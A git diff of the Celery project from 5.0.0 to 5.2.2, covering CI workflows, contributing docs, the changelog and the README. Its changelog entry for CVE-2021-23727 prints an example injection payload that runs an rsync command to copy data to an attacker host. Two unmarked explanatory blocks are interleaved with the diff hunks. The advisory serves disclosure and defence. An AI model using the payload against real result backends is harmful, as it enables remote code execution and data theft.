diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 80aca1abc6f..481050587d0 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.0.0
+current_version = 5.2.2
commit = True
tag = True
 parse = (?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(?P<releaselevel>[a-z\d]+)?
diff --git a/.github/ISSUE_TEMPLATE/Bug-Report.md b/.github/ISSUE_TEMPLATE/Bug-Report.md
index 9659e4c097e..25a9be322a1 100644
--- a/.github/ISSUE_TEMPLATE/Bug-Report.md
+++ b/.github/ISSUE_TEMPLATE/Bug-Report.md
@@ -13,7 +13,7 @@ bug reports which are incomplete.
To check an item on the list replace [ ] with [x].
-->
- [ ] I have verified that the issue exists against the `master` branch of Celery.
-- [ ] This has already been asked to the [discussion group](https://groups.google.com/forum/#!forum/celery-users) first.
+- [ ] This has already been asked on the [discussions forum](https://github.com/celery/celery/discussions) first.
- [ ] I have read the relevant section in the
[contribution guide](http://docs.celeryproject.org/en/latest/contributing.html#other-bugs)
on reporting bugs.
diff --git a/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md b/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md
index eeecc14df18..20e96f036fd 100644
--- a/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md
+++ b/.github/ISSUE_TEMPLATE/Major-Version-Release-Checklist.md
@@ -18,7 +18,7 @@ Release PR:
- [ ] Release PR reviewed
- [ ] The master branch build passes
- [](https://travis-ci.org/celery/celery)
+ [](https://github.com/celery/celery/actions/workflows/python-package.yml)
- [ ] Release Notes
- [ ] What's New
diff --git a/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md b/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md
index 208e34bd77f..c3656043b93 100644
--- a/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md
+++ b/.github/ISSUE_TEMPLATE/Minor-Version-Release-Checklist.md
@@ -12,7 +12,7 @@ Release PR:
- [ ] Release PR reviewed
- [ ] The master branch build passes
- [](https://travis-ci.org/celery/celery)
+ [](https://github.com/celery/celery/actions/workflows/python-package.yml)
- [ ] Release Notes
- [ ] What's New
diff --git a/.github/opencollective.yml b/.github/opencollective.yml
new file mode 100644
index 00000000000..be703c8b871
--- /dev/null
+++ b/.github/opencollective.yml
@@ -0,0 +1,18 @@
+collective: celery
+tiers:
+ - tiers: '*'
+ labels: ['Backer ❤️']
+ message: 'Hey . Thank you for supporting the project!:heart:'
+ - tiers: ['Basic Sponsor', 'Sponsor', 'Silver Sponsor', 'Gold Sponsor']
+ labels: ['Sponsor ❤️']
+ message: |
+ Thank you for sponsoring the project!:heart::heart::heart:
+ Resolving this issue is one of our top priorities.
+ One of @celery/core-developers will triage it shortly.
+invitation: |
+ Hey :wave:,
+ Thank you for opening an issue. We will get back to you as soon as we can.
+ Also, check out our [Open Collective](https://opencollective.com/celery) and consider backing us - every little helps!
+
+ We also offer priority support for our sponsors.
+ If you require immediate assistance please consider sponsoring us.
diff --git a/.github/workflows/changerelease.yml b/.github/workflows/changerelease.yml
new file mode 100644
index 00000000000..efbf5a52fef
--- /dev/null
+++ b/.github/workflows/changerelease.yml
@@ -0,0 +1,32 @@
+name: changerelease
+on:
+ workflow_dispatch: {}
+ push:
+ paths: [Changelog.rst]
+ branches: [master]
+ tags: ["*"]
+
+permissions:
+ contents: write
+
+jobs:
+ sync:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: docker://pandoc/core:2.14
+ with:
+ args: "Changelog.rst -f rst -t markdown -o CR_CHANGELOG.md"
+ - name: "Clean up markdown"
+ run: |
+ # https://stackoverflow.com/a/1252191/1110798
+ cat CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-date\n\n: /Release date: /g' CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-by\n\n: /Release by: /g' CR_CHANGELOG.md
+ cat CR_CHANGELOG.md
+ - uses: dropseed/changerelease@v1
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ changelog: CR_CHANGELOG.md
+ remote_changelog: false
+ limit: -1
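As a rough illustration (not part of the workflow itself), the two ``sed`` invocations in the "Clean up markdown" step above are equivalent to the following Python sketch, which flattens pandoc's definition-list output back into single lines:

.. code-block:: python

    # Illustrative Python equivalent of the two sed one-liners above.
    # Pandoc renders the rst fields as definition lists ("release-date\n\n: ..."),
    # which this flattens back to "Release date: ..." / "Release by: ..." lines.
    from pathlib import Path

    changelog = Path("CR_CHANGELOG.md")
    text = changelog.read_text()
    text = text.replace("release-date\n\n: ", "Release date: ")
    text = text.replace("release-by\n\n: ", "Release by: ")
    changelog.write_text(text)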
diff --git a/.github/workflows/lint_python.yml b/.github/workflows/lint_python.yml
new file mode 100644
index 00000000000..8c262d25569
--- /dev/null
+++ b/.github/workflows/lint_python.yml
@@ -0,0 +1,17 @@
+name: lint_python
+on: [pull_request, push]
+jobs:
+ lint_python:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: actions/setup-python@v2
+ - uses: pre-commit/action@v2.0.3
+ - run: pip install --upgrade pip wheel
+ - run: pip install bandit codespell flake8 isort pytest pyupgrade tox
+ - run: bandit -r . || true
+ - run: codespell --ignore-words-list="brane,gool,ist,sherif,wil" --quiet-level=2 --skip="*.key" || true
+ - run: pip install -r requirements.txt || true
+ - run: tox || true
+ - run: pytest . || true
+ - run: pytest --doctest-modules . || true
diff --git a/.github/workflows/post_release_to_hacker_news.yml b/.github/workflows/post_release_to_hacker_news.yml
new file mode 100644
index 00000000000..d81bfb22c43
--- /dev/null
+++ b/.github/workflows/post_release_to_hacker_news.yml
@@ -0,0 +1,17 @@
+on:
+ release:
+ types: [released]
+
+jobs:
+ post_release_to_hacker_news:
+ runs-on: ubuntu-latest
+ name: Post Release to Hacker News
+ steps:
+ - name: Post the Release
+ uses: MicahLyle/github-action-post-to-hacker-news@v1
+ env:
+ HN_USERNAME: ${{ secrets.HN_USERNAME }}
+ HN_PASSWORD: ${{ secrets.HN_PASSWORD }}
+ HN_TITLE_FORMAT_SPECIFIER: Celery v%s Released!
+ HN_URL_FORMAT_SPECIFIER: https://docs.celeryproject.org/en/v%s/changelog.html
+ HN_TEST_MODE: true
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
new file mode 100644
index 00000000000..54fdc3596dc
--- /dev/null
+++ b/.github/workflows/python-package.yml
@@ -0,0 +1,70 @@
+# This workflow will install Python dependencies, run tests and lint with a variety of Python versions
+# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
+
+name: Celery
+
+on:
+ push:
+ branches: [ 'master', '5.0' ]
+ paths:
+ - '**.py'
+ - '**.txt'
+ - '.github/workflows/python-package.yml'
+ - '**.toml'
+ pull_request:
+ branches: [ 'master', '5.0' ]
+ paths:
+ - '**.py'
+ - '**.txt'
+ - '**.toml'
+ - '.github/workflows/python-package.yml'
+
+jobs:
+ Unit:
+
+ runs-on: ${{ matrix.os }}
+ strategy:
+ fail-fast: false
+ matrix:
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7','pypy-3.8']
+ os: ["ubuntu-20.04", "windows-2019"]
+
+ steps:
+ - name: Install apt packages
+ if: startsWith(matrix.os, 'ubuntu-')
+ run: |
+ sudo apt update && sudo apt-get install -f libcurl4-openssl-dev libssl-dev gnutls-dev httping expect libmemcached-dev
+ - uses: actions/checkout@v2.4.0
+ - name: Set up Python ${{ matrix.python-version }}
+ uses: actions/setup-python@v2.2.2
+ with:
+ python-version: ${{ matrix.python-version }}
+
+ - name: Get pip cache dir
+ id: pip-cache
+ run: |
+ echo "::set-output name=dir::$(pip cache dir)"
+ - name: Cache
+ uses: actions/cache@v2.1.6
+ with:
+ path: ${{ steps.pip-cache.outputs.dir }}
+ key:
+ ${{ matrix.python-version }}-${{matrix.os}}-${{ hashFiles('**/setup.py') }}
+ restore-keys: |
+ ${{ matrix.python-version }}-${{matrix.os}}
+
+ - name: Install tox
+ run: python -m pip install --upgrade pip tox tox-gh-actions
+ - name: >
+ Run tox for
+ "${{ matrix.python-version }}-unit"
+ timeout-minutes: 20
+ run: |
+ tox --verbose --verbose
+
+ - uses: codecov/codecov-action@v2.1.0
+ with:
+ flags: unittests # optional
+ fail_ci_if_error: true # optional (default = false)
+ verbose: true # optional (default = false)
+
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5939ad63655..a542597b1c8 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,10 +1,29 @@
repos:
-- repo: https://github.com/ambv/black
- rev: stable
+ - repo: https://github.com/asottile/pyupgrade
+ rev: v2.29.0
hooks:
- - id: black
- language_version: python3.7
-- repo: https://github.com/pre-commit/pre-commit-hooks
- rev: v1.2.3
+ - id: pyupgrade
+ args: ["--py37-plus"]
+
+ - repo: https://github.com/PyCQA/flake8
+ rev: 4.0.1
hooks:
- - id: flake8
+ - id: flake8
+
+ - repo: https://github.com/asottile/yesqa
+ rev: v1.3.0
+ hooks:
+ - id: yesqa
+
+ - repo: https://github.com/pre-commit/pre-commit-hooks
+ rev: v4.0.1
+ hooks:
+ - id: check-merge-conflict
+ - id: check-toml
+ - id: check-yaml
+ - id: mixed-line-ending
+
+ - repo: https://github.com/pycqa/isort
+ rev: 5.10.1
+ hooks:
+ - id: isort
diff --git a/.travis.yml b/.travis.yml
deleted file mode 100644
index 96fb6f4d872..00000000000
--- a/.travis.yml
+++ /dev/null
@@ -1,139 +0,0 @@
-language: python
-dist: bionic
-cache: pip
-python:
- - '3.6'
- - '3.7'
- - '3.8'
- - '3.9-dev'
-os:
- - linux
-stages:
- - test
- - integration
- - lint
-services:
- - redis
- - docker
-env:
- global:
- - PYTHONUNBUFFERED=yes
- - CELERY_TOX_PARALLEL=
- jobs:
- - MATRIX_TOXENV=unit
-
-jobs:
- fast_finish: true
- allow_failures:
- - python: '3.9-dev'
- include:
- - python: '3.9-dev'
- env: MATRIX_TOXENV=integration-rabbitmq
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-rabbitmq
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-redis
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-dynamodb
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-azureblockblob
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-cache
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-cassandra
- stage: integration
-
- - python: 3.8
- env: MATRIX_TOXENV=integration-elasticsearch
- stage: integration
-
- - python: '3.8'
- env:
- - TOXENV=flake8,apicheck,configcheck,bandit
- - CELERY_TOX_PARALLEL='--parallel --parallel-live'
- stage: lint
- - python: pypy3.6-7.3.1
- env: TOXENV=pypy3
- stage: test
-
-before_install:
- - sudo install --directory --owner=travis /var/log/celery /var/run/celery
- - sudo apt install libcurl4-openssl-dev libssl-dev gnutls-dev httping expect
- - if [[ -v MATRIX_TOXENV ]]; then export TOXENV=${TRAVIS_PYTHON_VERSION}-${MATRIX_TOXENV}; fi; env
- - |
- if [[ "$TOXENV" == *rabbitmq ]]; then
- docker run -d -p 5672:5672 -p 15672:15672 rabbitmq:3.8-management
- while ! httping -c1 http://127.0.0.1:15672; do sleep 10; done
- fi
- - |
- if [[ "$TOXENV" =~ "pypy" ]]; then
- export PYENV_ROOT="$HOME/.pyenv"
- if [ -f "$PYENV_ROOT/bin/pyenv" ]; then
- cd "$PYENV_ROOT" && git pull
- else
- rm -rf "$PYENV_ROOT" && git clone --depth 1 https://github.com/pyenv/pyenv.git "$PYENV_ROOT"
- fi
- "$PYENV_ROOT/bin/pyenv" install "$PYPY_VERSION"
- virtualenv --python="$PYENV_ROOT/versions/$PYPY_VERSION/bin/python" "$HOME/virtualenvs/$PYPY_VERSION"
- source "$HOME/virtualenvs/$PYPY_VERSION/bin/activate"
- which python
- fi
- - |
- if [[ "$TOXENV" == *dynamodb ]]; then
- docker run -d -p 8000:8000 amazon/dynamodb-local
- while ! httping -c1 http://127.0.0.1:8000; do sleep 10; done
- fi
- - |
- if [[ "$TOXENV" == *cache ]]; then
- docker run -d -p 11211:11211 memcached:alpine
- while ! ./extra/travis/is-memcached-running 127.0.0.1 11211; do sleep 1; done
- fi
- - |
- if [[ "$TOXENV" == *cassandra ]]; then
- cassandra_container_id=$(sudo docker run -d -p 9042:9042 cassandra:latest)
- sudo docker exec $cassandra_container_id /bin/bash -c "while ! cqlsh -e 'describe cluster'; do sleep 1; done"
- sudo docker exec $cassandra_container_id /opt/cassandra/bin/cqlsh -e "CREATE KEYSPACE tests WITH REPLICATION = { 'class' : 'SimpleStrategy', 'replication_factor' : 1 };"
- sleep 1
- sudo docker exec $cassandra_container_id /opt/cassandra/bin/cqlsh -k tests -e "CREATE TABLE tests (task_id text, status text, result blob, date_done timestamp, traceback blob, children blob, PRIMARY KEY ((task_id), date_done)) WITH CLUSTERING ORDER BY (date_done DESC);"
- sleep 1
- fi
- - |
- if [[ "$TOXENV" == *elasticsearch ]]; then
- elasticsearch_container_id=$(sudo docker run -d -p 9200:9200 -e discovery.type=single-node elasticsearch:7.7.0)
- sudo docker exec $elasticsearch_container_id /bin/bash -c "while ! curl '127.0.0.1:9200/_cluster/health?wait_for_status=yellow&timeout=30s'; do sleep 1; done"
- fi
- - |
- docker run -d -e executable=blob -t -p 10000:10000 --tmpfs /opt/azurite/folder:rw arafato/azurite:2.6.5
- while ! httping -c1 http://127.0.0.1:10000; do sleep 10; done
- export AZUREBLOCKBLOB_URL="azureblockblob://DefaultEndpointsProtocol=http;AccountName=devstoreaccount1;AccountKey=Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==;BlobEndpoint=http://127.0.0.1:10000/devstoreaccount1;"
- - |
- wget -qO - https://packages.couchbase.com/ubuntu/couchbase.key | sudo apt-key add -
- sudo apt-add-repository -y 'deb http://packages.couchbase.com/ubuntu bionic bionic/main'
- sudo apt-get update && sudo apt-get install -y libcouchbase-dev
-install: pip --disable-pip-version-check install --upgrade-strategy eager -U tox | cat
-script: tox $CELERY_TOX_PARALLEL -v -- -v
-after_success:
- - |
- if [[ -v MATRIX_TOXENV || "$TOXENV" =~ "pypy" ]]; then
- .tox/$TOXENV/bin/coverage xml
- .tox/$TOXENV/bin/codecov -e TOXENV
- fi;
-notifications:
- email: false
- irc:
- channels:
- - "chat.freenode.net#celery"
- on_success: change
- on_failure: change
diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst
index 9814b9c7ee4..c96ee55fb1e 100644
--- a/CONTRIBUTING.rst
+++ b/CONTRIBUTING.rst
@@ -40,7 +40,7 @@ The Code of Conduct is heavily based on the `Ubuntu Code of Conduct`_, and
the `Pylons Code of Conduct`_.
.. _`Ubuntu Code of Conduct`: https://www.ubuntu.com/community/conduct
-.. _`Pylons Code of Conduct`: http://docs.pylonshq.com/community/conduct.html
+.. _`Pylons Code of Conduct`: https://pylonsproject.org/community-code-of-conduct.html
Be considerate
--------------
@@ -292,13 +292,12 @@ Branches
Current active version branches:
* dev (which git calls "master") (https://github.com/celery/celery/tree/master)
-* 4.2 (https://github.com/celery/celery/tree/4.2)
-* 4.1 (https://github.com/celery/celery/tree/4.1)
+* 4.5 (https://github.com/celery/celery/tree/v4.5)
* 3.1 (https://github.com/celery/celery/tree/3.1)
You can see the state of any branch by looking at the Changelog:
- https://github.com/celery/celery/blob/master/Changelog
+ https://github.com/celery/celery/blob/master/Changelog.rst
If the branch is in active development the topmost version info should
contain meta-data like:
@@ -447,7 +446,7 @@ fetch and checkout a remote branch like this::
.. _`Fork a Repo`: https://help.github.com/fork-a-repo/
.. _`Rebasing merge commits in git`:
- https://notes.envato.com/developers/rebasing-merge-commits-in-git/
+ https://web.archive.org/web/20150627054345/http://marketblog.envato.com/general/rebasing-merge-commits-in-git/
.. _`Rebase`: https://help.github.com/rebase/
.. _contributing-docker-development:
@@ -494,19 +493,19 @@ Some useful commands to run:
**Note:** This command will run tests for every environment defined in :file:`tox.ini`.
It takes a while.
-* ``pyenv exec python{2.7,3.5,3.6,3.7,3.8} -m pytest t/unit``
+* ``pyenv exec python{3.6,3.7,3.8,3.9} -m pytest t/unit``
To run unit tests using pytest.
- **Note:** ``{2.7,3.5,3.6,3.7,3.8}`` means you can use any of those options.
- e.g. ``pyenv exec python3.6 -m pytest t/unit``
+ **Note:** ``{3.6,3.7,3.8,3.9}`` means you can use any of those options.
+ e.g. ``pyenv exec python3.7 -m pytest t/unit``
-* ``pyenv exec python{2.7,3.5,3.6,3.7,3.8} -m pytest t/integration``
+* ``pyenv exec python{3.6,3.7,3.8,3.9} -m pytest t/integration``
To run integration tests using pytest
- **Note:** ``{2.7,3.5,3.6,3.7,3.8}`` means you can use any of those options.
- e.g. ``pyenv exec python3.6 -m pytest t/unit``
+ **Note:** ``{3.6,3.7,3.8,3.9}`` means you can use any of those options.
+ e.g. ``pyenv exec python3.7 -m pytest t/unit``
By default, docker-compose will mount the Celery and test folders in the Docker
container, allowing code changes and testing to be immediately visible inside
@@ -516,7 +515,7 @@ use are also defined in the :file:`docker/docker-compose.yml` file.
By running ``docker-compose build celery`` an image will be created with the
name ``celery/celery:dev``. This docker image has every dependency needed
for development installed. ``pyenv`` is used to install multiple python
-versions, the docker image offers python 2.7, 3.5, 3.6, 3.7 and 3.8.
+versions, the docker image offers python 3.6, 3.7, 3.8 and 3.9.
The default python version is set to 3.8.
The :file:`docker-compose.yml` file defines the necessary environment variables
@@ -677,7 +676,7 @@ Use the ``tox -e`` option if you only want to test specific Python versions:
.. code-block:: console
- $ tox -e 2.7
+ $ tox -e 3.7
Building the documentation
--------------------------
@@ -711,6 +710,20 @@ After building succeeds, the documentation is available at :file:`_build/html`.
.. _contributing-verify:
+Build the documentation using Docker
+------------------------------------
+
+Build the documentation by running:
+
+.. code-block:: console
+
+ $ docker-compose -f docker/docker-compose.yml up --build docs
+
+The service will start a local docs server at ``:7000``. The server uses
+``sphinx-autobuild`` with the ``--watch`` option enabled, so you can
+live-edit the documentation. Check the additional options and configs in
+:file:`docker/docker-compose.yml`.
+
Verifying your contribution
---------------------------
@@ -831,14 +844,13 @@ make it easier for the maintainers to accept your proposed changes:
``pytest -xv --cov=celery --cov-report=xml --cov-report term``.
You can check the current test coverage here: https://codecov.io/gh/celery/celery
-- [ ] Run ``flake8`` against the code. The following commands are valid
+- [ ] Run ``pre-commit`` against the code. The following commands are valid
and equivalent.:
.. code-block:: console
- $ flake8 -j 2 celery/ t/
- $ make flakecheck
- $ tox -e flake8
+ $ pre-commit run --all-files
+ $ tox -e lint
- [ ] Build api docs to make sure everything is OK. The following commands are valid
and equivalent.:
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 748cabf4d0b..1c497349f54 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -277,3 +277,12 @@ Kyle Johnson, 2019/09/23
Dipankar Achinta, 2019/10/24
Sardorbek Imomaliev, 2020/01/24
Maksym Shalenyi, 2020/07/30
+Frazer McLean, 2020/09/29
+Henrik Bruåsdal, 2020/11/29
+Tom Wojcik, 2021/01/24
+Ruaridh Williamson, 2021/03/09
+Garry Lawrence, 2021/06/19
+Patrick Zhang, 2017/08/19
+Konstantin Kochin, 2021/07/11
+kronion, 2021/08/26
+Gabor Boros, 2021/11/09
diff --git a/Changelog.rst b/Changelog.rst
index a8fc6d47665..c5cfddf4075 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -5,65 +5,202 @@
================
This document contains change notes for bugfix & new features
-in the 5.0.x series, please see :ref:`whatsnew-5.0` for
-an overview of what's new in Celery 5.0.
+in the 5.2.x series, please see :ref:`whatsnew-5.2` for
+an overview of what's new in Celery 5.2.
+.. _version-5.2.2:
-5.0.0
+5.2.2
=====
-:release-date: 2020-09-24 6.00 P.M UTC+3:00
+
+:release-date: 2021-12-26 4.30 P.M UTC+2:00
:release-by: Omer Katz
-- **Breaking Change** Remove AMQP result backend (#6360).
-- Warn when deprecated settings are used (#6353).
-- Expose retry_policy for Redis result backend (#6330).
-- Prepare Celery to support the yet to be released Python 3.9 (#6328).
+- Various documentation fixes.
+- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
-5.0.0rc3
-========
-:release-date: 2020-09-07 4.00 P.M UTC+3:00
-:release-by: Omer Katz
+ When a task fails, the failure information is serialized in the backend.
+ In some cases, the exception class is only importable from the
+ consumer's code base. In this case, we reconstruct the exception class
+ so that we can re-raise the error on the process which queried the
+ task's result. This was introduced in #4836.
+ If the recreated exception type isn't an exception, this is a security issue.
+ Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
+ ``os.system("rsync /data attacker@192.168.56.100:~/data")``
+ by setting the task's result to a failure in the result backend, with ``os`` as the exception module,
+ the ``system`` function as the exception type, and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments, like so:
-- More cleanups of leftover Python 2 support (#6338).
+ .. code-block:: python
+
+ {
+ "exc_module": "os",
+ "exc_type": "system",
+ "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ }
+
+ According to my analysis, this vulnerability can only be exploited if
+ the producer delayed a task which runs long enough for the
+ attacker to change the result mid-flight, and the producer has
+ polled for the task's result.
+ The attacker would also have to gain access to the result backend.
+ The severity of this security vulnerability is low, but we still
+ recommend upgrading.
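For readers who want to see the shape of the guard described above, here is a minimal, hypothetical sketch (this is not the actual Celery patch; the function name and the error raised are illustrative):

.. code-block:: python

    # Hypothetical sketch of the guard described above -- NOT the actual patch.
    # It rebuilds an exception class from the (exc_module, exc_type) pair stored
    # in the result backend and refuses anything that is not an exception
    # subclass, so a payload such as {"exc_module": "os", "exc_type": "system"}
    # is rejected instead of being called.
    import importlib

    def rebuild_exception(exc_module, exc_type, exc_message):
        module = importlib.import_module(exc_module)
        cls = getattr(module, exc_type)
        if not isinstance(cls, type) or not issubclass(cls, BaseException):
            raise TypeError(
                f"{exc_module}.{exc_type} is not an exception type; "
                "refusing to rebuild it")
        return cls(exc_message)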
+
+
+.. _version-5.2.1:
+
+5.2.1
+=====
+
+:release-date: 2021-11-16 8.55 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Fix rstrip usage on bytes instance in ProxyLogger.
+- Pass logfile to ExecStop in celery.service example systemd file.
+- fix: reduce latency of AsyncResult.get under gevent (#7052)
+- Limit redis version: <4.0.0.
+- Bump min kombu version to 5.2.2.
+- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
+- Remove dependency to case (#7077).
+- fix: task expiration is timezone aware if needed (#7065).
+- Initial testing of pypy-3.8 beta to CI.
+- Docs, CI & tests cleanups.
-5.0.0rc2
-========
-:release-date: 2020-09-01 6.30 P.M UTC+3:00
-:release-by: Omer Katz
-- Bump minimum required eventlet version to 0.26.1.
-- Update Couchbase Result backend to use SDK V3.
-- Restore monkeypatching when gevent or eventlet are used.
+.. _version-5.2.0:
-5.0.0rc1
+5.2.0
+=====
+
+:release-date: 2021-11-08 7.15 A.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Prevent from subscribing to empty channels (#7040)
+- fix register_task method.
+- Fire task failure signal on final reject (#6980)
+- Limit pymongo version: <3.12.1 (#7041)
+- Bump min kombu version to 5.2.1
+
+.. _version-5.2.0rc2:
+
+5.2.0rc2
========
-:release-date: 2020-08-24 9.00 P.M UTC+3:00
-:release-by: Omer Katz
-- Allow to opt out of ordered group results when using the Redis result backend (#6290).
-- **Breaking Change** Remove the deprecated celery.utils.encoding module.
+:release-date: 2021-11-02 1.54 P.M UTC+3:00
+:release-by: Naomi Elstein
+
+- Bump Python 3.10.0 to rc2.
+- [pre-commit.ci] pre-commit autoupdate (#6972).
+- autopep8.
+- Prevent the worker from sending expired revoked items upon hello command (#6975).
+- docs: clarify the 'keeping results' section (#6979).
+- Update deprecated task module removal in 5.0 documentation (#6981).
+- [pre-commit.ci] pre-commit autoupdate.
+- try python 3.10 GA.
+- mention python 3.10 on readme.
+- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
+- Azure blockblob backend parametrized connection/read timeouts (#6978).
+- Add as_uri method to azure block blob backend.
+- Add possibility to override backend implementation with celeryconfig (#6879).
+- [pre-commit.ci] pre-commit autoupdate.
+- try to fix deprecation warning.
+- [pre-commit.ci] pre-commit autoupdate.
+- not needed anymore.
+- not needed anymore.
+- not used anymore.
+- add github discussions forum
+
+.. _version-5.2.0rc1:
+
+5.2.0rc1
+========
+:release-date: 2021-09-26 4.04 P.M UTC+3:00
+:release-by: Omer Katz
-5.0.0b1
+- Kill all workers when main process exits in prefork model (#6942).
+- test kombu 5.2.0rc1 (#6947).
+- try moto 2.2.x (#6948).
+- Prepared Hacker News Post on Release Action.
+- update setup with python 3.7 as minimum.
+- update kombu on setupcfg.
+- Added a note about automatically killing all child processes of the worker after its termination.
+- [pre-commit.ci] pre-commit autoupdate.
+- Move importskip before greenlet import (#6956).
+- amqp: send expiration field to broker if requested by user (#6957).
+- Single line drift warning.
+- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
+- Allow to enable Events with app.conf mechanism.
+- Warn when expiration date is in the past.
+- Add the Framework :: Celery trove classifier.
+- Give indication whether the task is replacing another (#6916).
+- Make setup.py executable.
+- Bump version: 5.2.0b3 → 5.2.0rc1.
+
+.. _version-5.2.0b3:
+
+5.2.0b3
=======
-:release-date: 2020-08-19 8.30 P.M UTC+3:00
-:release-by: Omer Katz
-- **Breaking Change** Drop support for the Riak result backend (#5686).
-- **Breaking Change** pytest plugin is no longer enabled by default (#6288).
- Install pytest-celery to enable it.
-- **Breaking Change** Brand new CLI based on Click (#5718).
+:release-date: 2021-09-02 8.38 P.M UTC+3:00
+:release-by: Omer Katz
-5.0.0a2
+- Add args to LOG_RECEIVED (fixes #6885) (#6898).
+- Terminate job implementation for eventlet concurrency backend (#6917).
+- Add cleanup implementation to filesystem backend (#6919).
+- [pre-commit.ci] pre-commit autoupdate (#69).
+- Add before_start hook (fixes #4110) (#6923).
+- Restart consumer if connection drops (#6930).
+- Remove outdated optimization documentation (#6933).
+- added https verification check functionality in arangodb backend (#6800).
+- Drop Python 3.6 support.
+- update supported python versions on readme.
+- [pre-commit.ci] pre-commit autoupdate (#6935).
+- Remove appveyor configuration since we migrated to GA.
+- pyupgrade is now set to upgrade code to 3.7.
+- Drop exclude statement since we no longer test with pypy-3.6.
+- 3.10 is not GA so it's not supported yet.
+- Celery 5.1 or earlier supports Python 3.6.
+- Fix linting error.
+- fix: Pass a Context when chaining fail results (#6899).
+- Bump version: 5.2.0b2 → 5.2.0b3.
+
+.. _version-5.2.0b2:
+
+5.2.0b2
=======
-:release-date: 2020-08-05 7.15 P.M UTC+3:00
+
+:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz
-- Bump Kombu version to 5.0 (#5686).
+- Test windows on py3.10rc1 and pypy3.7 (#6868).
+- Route chord_unlock task to the same queue as chord body (#6896).
+- Add message properties to app.tasks.Context (#6818).
+- handle already converted LogLevel and JSON (#6915).
+- 5.2 is codenamed dawn-chorus.
+- Bump version: 5.2.0b1 → 5.2.0b2.
+
+.. _version-5.2.0b1:
-5.0.0a1
+5.2.0b1
=======
-:release-date: 2020-08-02 9.30 P.M UTC+3:00
+
+:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz
-- Removed most of the compatibility code that supports Python 2 (#5686).
-- Modernized code to work on Python 3.6 and above (#5686).
+- Add Python 3.10 support (#6807).
+- Fix docstring for Signal.send to match code (#6835).
+- No blank line in log output (#6838).
+- Chords get body_type independently to handle cases where body.type does not exist (#6847).
+- Fix #6844 by allowing safe queries via app.inspect().active() (#6849).
+- Fix multithreaded backend usage (#6851).
+- Fix Open Collective donate button (#6848).
+- Fix setting worker concurrency option after signal (#6853).
+- Make ResultSet.on_ready promise hold a weakref to self (#6784).
+- Update configuration.rst.
+- Discard jobs on flush if synack isn't enabled (#6863).
+- Bump click version to 8.0 (#6861).
+- Amend IRC network link to Libera (#6837).
+- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
+- Fix inspect --json output to return valid json without --quiet.
+- Remove celery.task references in modules, docs (#6869).
+- The Consul backend must correctly associate requests and responses (#6823).
diff --git a/README.rst b/README.rst
index cb2d07c42f9..78172ff29a5 100644
--- a/README.rst
+++ b/README.rst
@@ -2,8 +2,8 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.0.0 (singularity)
-:Web: http://celeryproject.org/
+:Version: 5.2.2 (dawn-chorus)
+:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
:Keywords: task, queue, job, async, rabbitmq, amqp, redis,
@@ -57,21 +57,22 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.0.0 runs on,
+Celery version 5.2.0 runs on,
-- Python (3.6, 3.7, 3.8)
-- PyPy3.6 (7.6)
+- Python (3.7, 3.8, 3.9, 3.10)
+- PyPy3.7 (7.3.7+)
-This is the next version to of celery which will support Python 3.6 or newer.
+This is the version of celery which will support Python 3.7 or newer.
If you're running an older version of Python, you need to be running
an older version of Celery:
- Python 2.6: Celery series 3.1 or earlier.
- Python 2.5: Celery series 3.0 or earlier.
-- Python 2.4 was Celery series 2.2 or earlier.
